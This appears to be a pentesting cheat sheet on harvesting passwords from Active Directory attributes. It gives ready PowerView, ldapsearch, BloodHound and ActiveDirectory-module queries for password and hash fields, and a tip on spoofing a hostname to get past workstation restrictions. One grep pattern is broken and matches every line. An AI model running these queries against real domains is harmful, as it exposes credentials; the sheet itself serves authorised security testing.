Password in Active Directory attributes#
Inb order to search through users or objects you need to
Interesting attributes to search for, remember these can be for either computer or a user.
comment
description
UserPassword
UnixUserPassword
unicodePwd
msSFU30Password
Other interesting might be
adminDescription
dBCSPwd
lmpwdHistory
nTPwdHistory
supplementalCredentials
Using PowerView#
Get-DomainUser -Domain evilcorp.local -Properties samaccountname,comment,description,userpassword,unixuserpassword,unicodepwd,mssfu30password,admindescription,dbcspwd,lmpwdhistory,ntpwdhistory,supplementalcredentials -LDAPFilter '(|(comment=*)(description=*)(userpassword=*)(unixuserpassword=*)(unicodepwd=*)(mssfu30password=*)(admindescription=*)(dbcspwd=*)(lmpwdhistory=*)(ntpwdhistory=*)(supplementalcredentials=*))' | fl > C:\attributes.txt
Using ldap query#
ldapsearch -h evilcorp.local -w SecretPassword -b "dc=evilcorp,dc=local" -D "cn=Philip L,cn=users,dc=evilcorp,dc=local" "(|(userPassword=*)(UnixUserPassword=*)(unicodePwd=*)(msSFU30Password=*)(adminDescription=*)(lmpwdHistory=*)(nTPwdHistory=*)(supplementalCredentials=*))" userPassword unixUserPassword unicodePwd msSFU30Password adminDescription lmpwdHistory nTPwdHistory supplementalCredentials
These will generate a lot of results, and you will have to go through the result one by way, or just grep for relevant words. If the LDAP server has a maxsize of results to display, it will cap the response at that size. To get around that, and to not make mega-queries, your can set a size-limit, and then be promped to receive more.
If the response contains åäö the result is base64-encoded.
ldapsearch -E pr=500/prompt -h evilcorp.local -w SecretPassword -b "dc=evilcorp,dc=local" -D "cn=Philip L,cn=users,dc=evilcorp,dc=local" "(|(description=*)(comment=*)(info=*))" description comment info | tee results.txt
grep -i 'pwd\|passw\|lösen\|losen\|somma\|vinter\|'
Or you can perform the search in the LDAP query itself:
ldapsearch -h evilcorp.local -w SecretPassword -b "dc=evilcorp,dc=local" -D "cn=Philip L,cn=users,dc=evilcorp,dc=local" "(|(description=*passw*)(description=*lösen*)(description=*losen*)(comment=*passw*)(comment=*lösen*)(comment=*losen*))"
Debugging problems#
If you receive this error it means that you are not allowed to authenticate to the LDAP server from your HOST.
additional info: 80090308: LdapErr: DSID-0C09042A, comment: AcceptSecurityContext error, data 531, v3839
On your AD users there exists an attribute called userWorkstations
, this attribute specified from which workstations you are allowed to authenticate to the LDAP server. Since your linux-machines hostname is not among those specified in the userWorkstations
attribute you are not allowed.
A possible workaround, that I have not tested but might work, is to change the hostname to a hostname that is specified in userWorkstations
attribute of the user. This presents a catch22, because you need LDAP access to know which userWorksations
are allowed.
Using Bloodhound and bash#
echo "match (a) return a.description;" | /usr/share/neo4j/bin/cypher-shell -u neo4j -p <creds> --format plain | sort -u
Using ActiveDirectory module#
# This will only search for a specific OU
Get-ADUser -Filter * -SearchBase "OU=Users OU,DC=hackdomain,DC=local" -Properties comment
# This will search for the whole domain
Get-ADUser -Filter * -SearchBase "DC=hackdomain,DC=local" -Properties comment